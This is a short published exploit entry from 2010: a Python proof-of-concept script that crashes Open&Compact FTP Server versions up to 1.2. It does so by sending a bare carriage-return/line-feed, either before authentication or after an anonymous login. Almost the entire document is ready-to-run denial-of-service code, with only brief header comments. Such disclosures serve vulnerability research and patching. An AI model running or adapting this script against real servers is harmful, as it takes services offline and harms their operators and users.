# Exploit Title: Open&Compact Ftp Server <= 1.2 Denial Of Service
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

#!/usr/bin/python

# This exploits allows to crash open ftpd server at any time simply
# by sending '\r\n' into the socket. 
# You can send '\r\n' before authentication or after authentication
# and the server will always crash. 
# Below are two examples of crashing the server:
# Call either crashServerBeforeAuth or crashServerAfterAuth from 
# the main function.

import socket



def main():
   s.connect( ( "127.0.0.1", 21 ) )

   crashServerBeforeAuth()
   # crashServerAfterAuth() 

   s.close() 


def crashServerBeforeAuth(): 
   print s.recv( 512 )
   s.send( '\r\n' )

def crashServerAfterAuth():
   print s.recv( 512 )
   s.send('USER anonymous\r\n' )
   print s.recv( 512 )
   s.send('PASS anonymous\r\n' )
   print s.recv( 512 )

   s.send( '\r\n' ) 


if __name__ == "__main__":
   s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
   main()